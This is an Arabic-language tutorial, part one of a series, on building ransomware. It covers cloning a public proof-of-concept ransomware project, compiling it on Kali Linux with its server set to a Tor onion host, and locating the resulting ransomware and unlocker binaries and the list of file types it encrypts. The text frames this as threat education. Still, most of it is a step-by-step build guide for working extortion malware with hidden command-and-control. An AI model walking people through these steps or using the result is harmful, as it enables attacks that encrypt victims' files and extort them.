الجزء الأول : شرح إنشاء فيروس طلب الفدية خاص بك Ransomware

 أصبحت برامج الفدية بسرعة أهم أشكال البرامج الضارة التي تصيب أنظمتنا الرقمية. تتعرض الشركات في جميع أنحاء العالم لأشكال مختلفة من البرامج الضارة بما في ذلك البديل الجديد ، Snake ، المصمم خصيصًا لأنظمة SCADA / ICS. تم إغلاق خط الأنابيب الاستعماري في الولايات المتحدة لمدة أسبوع تقريبًا قبل دفع فدية قدرها 5 ملايين دولار ، مما يدل على خطر برنامج الفدية هذا على الأنظمة الصناعية والبنية التحتية للدولة. في الآونة الأخيرة ، اعترفت شركة التأمين الأمريكية الكبرى ، CNA ، بدفع فدية قدرها 40 مليون دولار! لا عجب أن مطوري برامج الفدية أصبحوا أكثر إبداعًا وخبثًا ، فبرامج الفدية تدفع!

لفهم كيفية عمل برامج الفدية بشكل أفضل ، دعنا نبني برامج الفدية الخاصة بنا من إثبات المفهوم (POC) المتوفر من mauri870 على github.com. لقد طور برنامج الفدية هذا كجزء من برنامجه الأكاديمي ولم يتم تصميمه لأغراض ضارة ولكن بدلاً من ذلك لمساعدتنا في فهم كيفية عمل برامج الفدية. مثل المتغير الجديد ، الأفعى ، وعدد متزايد من سلالات البرامج الضارة ، تمت كتابة هذه البرامج الضارة في Golang.

يقوم هذا البرنامج الضار بتشفير الملفات في الخلفية باستخدام AES-256-CTR ويستخدم RSA-4096 لتأمين تبادل البيانات مع الخادم. يشبه برنامج الفدية هذا إلى حد كبير Cryptolocker ، وهو أحد أنجح هجمات برامج الفدية في التاريخ.

أولا : قم بتنزيل وتثبيت الثنائيات

تتمثل الخطوة الأولى في تشغيل جهاز Kali الخاص بك والتأكد من تثبيت برنامج golang. إذا لم يكن كذلك ، فقم بتنزيله من مستودعات Kali عن طريق إدخال ؛ 

kali > sudo apt install golang

بعد ذلك ، ستحتاج إلى تسجيل الدخول إلى المستخدم الجذر.

kali > sudo su - 

الآن قم بإنشاء دليل للثنائيات. في هذه الحالة ، سميته ببساطة "git".

kali >mkdir git .بعد ذلك ، قم بتغيير الدليل (cd) إلى هذا الدليل

kali > cd git
github الأن نقوم بالتحميل الأداة من موقع

kali > git clone https://github.com/mauri870/ransomware

ثانيا : تصدير متغيرات البيئة GO

بعد ذلك ، نحتاج إلى تعيين بعض متغيرات البيئة لتوجيه الثنائيات و GO إلى الدلائل المناسبة.

ثالثا : اجعل تبعيات كود المصدر

الآن ، مع تعيين المتغيرات وتصديرها ، نحتاج إلى عمل التبعيات. انتقل إلى الدليل الجديد ، و ransomware ، وأدخل make deps.

kali > cd ransomware

kali > make deps

رابعا : جعل شفرة المصدر مع الخيارات

الآن بعد أن أكملنا إنشاء الأقسام ، يمكننا البدء في إنشاء الكود المصدري. في حالتنا ، سوف نستخدم بعض الخيارات. أولاً ، نريد استخدام ToR لتشفير اتصالاتنا عبر شبكة ToR.

USE_TOR=truehackersarisegtdj.onion   ثانيًا ، نريد استخدام خادم الويب المظلم الخاص بنا على (يمكنك استخدام أي مجال أو مضيف محلي)

SERVER_HOST=hackersarisegtdj.onionثالثًا ، نريد استخدام المنفذ 80 (يمكنك استخدام أي منفذ)

SERVER_PORT=80   Linux أخيرًا ، نريد ضبط نظام التشغيل على تجميع الكود المصدري لنظام التشغيل الخاص بنا ، في هذه الحالة GOOS=linux

يجب أن تبدو قيادتنا مثل هذا ؛

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linuxالأن إضغط على إنتر و شاهد تجميعة برامج الفدية : خامسابمجرد إنشاء الكود المصدري ، قم بعمل قائمة طويلة في دليل رانسومواري

kali > ls -l

الأن إنتقل إلى دليل bin

kali > cd bin

هنا نرى ملف ransomware.exeو الخادم الخاص به unlocker.exe

سادسا : أفصح أنواع الملفات المطلوب تشفيرها .

إذا كنت تريد معرفة أنواع الملفات التي سيقوم برنامج الفدية هذا بتشفيرها ، فانتقل إلى دليل cmd وافتح common.go

kali > cd cmd

kali > more common.go

هنا ، يمكنك رؤية امتدادات الملفات التي سيستهدفها برنامج الفدية هذا لتشفيرها عند تنفيذه

ملخص : 

من المحتمل أن تكون برامج الفدية هي أكبر تهديد لأنظمتنا الرقمية في الوقت الحالي. كما أظهر هجوم خط الأنابيب الاستعماري بوضوح ، فإن الجميع تقريبًا معرضون للخطر ، وإذا تم اختراق أنظمة SCADA / ICS ، فقد يكون هناك تداعيات اقتصادية وبنية تحتية كبيرة!

سيساعدك POC الخاص ببرمجيات الفدية على فهم برامج الفدية بشكل أفضل كتهديد واختبار ما إذا كانت أنظمتك معرضة لمثل هذا الهجوم.

في الجزء الثاني من هذه السلسلة ، سنختبر برنامج الفدية هذا على جهاز Windows VM.